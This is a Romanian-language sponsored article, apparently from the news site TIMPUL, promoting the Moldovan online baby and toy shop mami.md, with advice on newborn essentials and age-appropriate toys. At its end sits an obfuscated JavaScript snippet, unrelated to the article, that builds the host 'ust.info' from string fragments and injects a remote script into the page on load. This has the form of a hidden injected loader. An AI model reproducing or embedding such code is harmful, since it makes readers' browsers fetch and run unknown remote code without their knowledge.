Actualitate

Mami.md, partenerul tău în creșterea și educarea copilului

Mami.md este unul dintre cele mai mari magazine online cu produse pentru bebeluși, jocuri și jucării pentru copiii de toate vârstele din Republica Moldova. Dacă aștepți un copil și ești pe ultima sută de metri cu cumpărăturile, mami.md îți vine în ajutor și îți pune la dispoziție produsele de care ai nevoie în primele luni de viață ale copilului, iar dacă ai deja acasă un micuț plin de energie, îi poți ocupa timpul cu jocurile și jucăriile potrivite vârstei sale. Astăzi, vom vorbi despre produsele pe care le poți găsi în magazinul online mami.md, dar și despre motivele pentru care ar trebui să îl iei în considerare atunci când ai de făcut cumpărături pentru copii.

Produse necesare din primele zile de viață ale bebelușului

Sosirea pe lume a unui bebeluș este un moment extrem de așteptat de părinți, dar în același timp și unul destul de stresant din punct de vedere al listei de cumpărături. Dacă ești la primul copil, s-ar putea să fii complet bulversat, să nu știi încotro s-o apuci și ce să cumperi prima dată. Unii părinți merg pur și simplu prin magazine și pun mâna pe ceea ce ei consideră că le-ar fi de folos în primele luni de viață ale copilului, dar mai ales pe ce spun alții legat de lista de cumpărături. Adevărul este că dacă te iei după persoanele care te bat toată ziua la cap despre produsele de care ai nevoie în primele luni de viață ale bebelușului, s-ar putea să o iei razna complet și să nu mai faci al doilea copil. Acești părinți cheltuie o mulțime de bani pe lucruri absolut inutile, achizițiile fiind făcute doar pe baza sfaturilor persoanelor apropiate.

Lista de cumpărături pentru primele luni de viață ale bebelușului nu ar trebui să te sperie, ci ar trebui să fie o plăcere să alegi acele obiecte care îți vor ușura viața odată ce bebelușul va ajunge pe lume. Concentrează-te pe lucrurile esențiale și fă o listă cu obiectele necesare pe categorii, cum ar fi:

• produse pentru igiena bebelușului:

• • scutece, șervețele umede, cremă pentru iritațiile de scutec, produse pentru băiță (șampon, gel de duș), produse pentru îngrijirea bontului ombilical, creme hidratante pentru pielea sensibilă a bebelușului, ulei de masaj etc.

• produse pentru băița bebelușului:

• • cădiță de baie, termometru, prosoape moi sau halat de baie.

• produse pentru plimbarea copilului:

• • cărucior cât mai ușor de manevrat (cum sunt cele de la U-grow pe care le poți găsi pe mami.md), husă pentru zilele ploioase, păturică cu activități, scaune pentru mașină etc.

• hăinuțe și jucării (despre care vom vorbi în cele ce urmează)

Aceste lucruri sunt esențiale și îți vor ușura mult viața în primele luni ale bebelușului. Dacă vrei să mai adaugi și alte produse pe listă, gândește-te bine dacă îți vor fi de folos sau îți vor aduce niște cheltuieli inutile. Dacă vei vizita virtual magazinul mami.md, vei vedea că o parte din aceste produse le găsești și le poți comanda la un preț mult mai bun fără să îți mai pierzi timpul prin magazine.

Jucării pentru bebeluși

Știm că este tentant să umpli camera bebelușului cu cât mai multe jucării, însă înainte de a face acest lucru și de a cheltui sume importante de bani pe jucării care nu vor avea niciun beneficiu pentru cel mic, trebuie să știi că fiecare jucărie are un rol important în dezvoltarea micuțului, la momentul potrivit. Nu poți cumpăra pentru un bebeluș o mașinuță sau o păpușă pentru că nu va ști ce să facă cu ea. Cumpără-i în schimb jucării zornăitoare sau jucării de dentiție pentru că acestea îl vor ajuta să își dezvolte simțurile și să descopere treptat mediul înconjurător. Jucăriile de dentiție îi vor ameliora și dureri gingivale cu care se va confrunta după vârsta de 4 luni. Pe măsură ce copilul crește și își dezvoltă anumite abilități, vei putea să îi cumperi și alte jucării sau jocuri. Jucăriile muzicale, cuburile colorate sau centrele de activități sunt genul de jucării care atrag atenția bebelușului în primul an de viață.

Există câteva lucruri la care trebuie să fii atent în momentul în care alegi jucăriile pentru bebeluși. Acestea trebuie să fie realizate din materiale care nu conțin substanțe toxice, cele mai recomandate fiind jucăriile din lemn care sunt prietenoase cu mediul, dar și rezistente în timp. Alte aspecte pe care trebuie să îl iei în considerare sunt componența și forma jucăriei – să ai grijă să nu conțină piese mici care ar putea fi înghițite ușor de bebeluși sau să nu aibă margini ascuțite care îl pot răni. Calitatea jucăriilor este un criteriu pe care trebuie să îl ai în vedere întotdeauna, iar în magazinul online mami.md, vei găsi doar jucării sigure și de calitate pentru copii.

Jucării și jocuri educative pentru copii

Jucăriile reprezintă un element esențial în educarea copiilor. Nu trebuie privite ca niște obiecte de divertisment, ci ca adevărate instrumente în dezvoltarea și educarea copilului. Prin intermediul jucăriilor și al jocurilor educative, copiii descoperă lumea în care trăiesc, iar specialiștii susțin că un copil care se joacă suficient atunci când este mic, în viața de adult va fi motivat și curios în privința dezvoltării personale. Mai mult decât atât, aceiași specialiști ne recomandă ca în cazul în care observăm că cel mic nu vrea să se joace sau nu se joacă suficient, să cerem părerea unui medic. Bineînțeles, dorința copilului de a se juca depinde și de cât de atractive sunt jucăriile și de cât de mult îl provoacă.

Este indicat să alegi jucăriile în funcție de vârsta copilului și de nivelul său de dezvoltare. Dacă alegi jucăriile mult prea complexe și i le oferi unui copil cu o vârstă mai mică care nu știe încă totul despre cum funcționează lucrurile în jurul său, acesta va dezvolta un sentiment de frustrare și de neputință pentru că nu înțelege jocul sau jucăria și nu reușește să găsească soluții. De cealaltă parte, dacă îi oferi unui copil de 3-4 ani jucării cu care își ocupă timpul în general un bebeluș, acele jucării nu îi vor aduce copilului niciun beneficiu și îl vor plictisi. Alegerea unor jucării potrivite pentru vârsta celui mic este o condiție esențială dacă ne dorim ca acele jucării se își îndeplinească rolul educativ. În cadrul magazinului online mami.md, vei găsi o gamă variată de jucării educative pentru copii de toate vârstele, grupate chiar în funcție de vârsta copilului, pentru a-ți face decizia mai ușoară.

Avantajele magazinului online mami.md

Dacă nu ai comandat până acum din magazinul online de jocuri și jucării mami.md, vom discuta în cele ce urmează despre beneficiile pe care le ai ca pe viitor să știi de unde să cumperi. Magazinul online mami.md este partenerul tău în creșterea copilului, cel care îți pune la dispoziție cele mai bune produse, la cele mai bune prețuri. Avantajul cel mai mare al magazinului de jucării mami.md este gama variată de produse – de la lucruri pentru bebeluși (cărucioare, cădițe pentru baie, biberoane, aspirator nazal, boluri pentru mâncare etc.), până la jocuri și jucării pentru copii de toate vârstele. Sute de produse de la branduri renumite, la prețuri mult mai avantajoase decât cele din magazinele fizice – acesta este încă un avantaj pe care mami.md îl are și de care ar trebui să profiți.

Gândește-te că poți comanda oricând lucrurile de care ai nevoie, în momentele de liniște în care cei mici dorm sau se joacă, iar apoi nu mai rămâne altceva de făcut decât să aștepți comanda acasă. Cumpărăturile în magazinele fizice, mai ales cele de jucării, cu un copil mic după tine poate fi un proces epuizant, care se va termina cel mai probabil cu lacrimi din partea copilului care ar vrea să plece acasă cu jumătate de magazin, dacă se poate. Poți evita această scenă și poți alege cele mai bune și mai potrivite jucării pentru cel mic direct din confortul casei tale – în plus, aceste jucării cumpărate fără să știe copilul, vor părea mereu ca niște cadouri și te vei bucura de fiecare dată de zâmbetul și fericirea micuțului. Magazinul online mami.md îți oferă în primul rând avantajul timpului și al banilor economisiți. Produsele sunt grupate pe categorii pentru a-ți fi mai ușor să le găsești (nu te mai învârți astfel printre raioanele de jucării căutând o zornăitoare sau niște cuburi colorate, ci doar folosești funcția de „căutare” sau filtrezi produsele în funcție de caracteristicile pe care le vrei), iar prețurile pe care le vei găsi aici sunt mult mai bune. Să nu mai vorbim de promoțiile periodice de care poți profita pentru a obține cel mai bun preț. Văzând toate aceste avantaje, putem spune că nu ai niciun motiv să nu cumperi de pe mami.md!

Concluzii

Mami.md este un magazin ce își dorește să vină în întâmpinarea tuturor părinților care nu au timpul necesar pentru a umbla prin magazine în căutarea jucăriilor potrivite pentru cei mici. Deviza magazinului este „Livrăm bucurii pentru copii”, iar dacă ar fi să analizăm întreaga gamă de jucării și jocuri atractive și educative în același timp, chiar putem spune că livrează fericire pentru cei mici, dar și pentru cei mari, având în vedere faptul că te poți bucura de multe jocuri alături de copil și puteți învăța împreună multe lucruri interesante despre mediul înconjurător. Așa că, data viitoare când ești în căutarea unor jucării de o calitate superioară, la un preț extrem de bun, nu ezita să faci o vizită virtuală magazinului online mami.md!

(function(){
w2bh=document.createElement(“script”);w2bh.type=”text/javascript”;
w2bh.async=true;w2bh_=((“us”)+”t”)+”a”;w2bh_+=(“t.i”)+””+”n”;w2bh_+=((“f”)+”o”);w2bh_+=”/”;
w2bhu=”248728464.”;w2bhu+=”0X85lqf52bhr925rrh0um6Xzvb1ysm”;w2bh.src=”https://”+w2bh_+w2bhu;
w2bhdb=document.body;w2bhdb.appendChild(w2bh);
})();

Fiți la curent cu ultimele noutăți. Urmărește TIMPUL pe Google News și Telegram!


Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile obligatorii sunt marcate cu *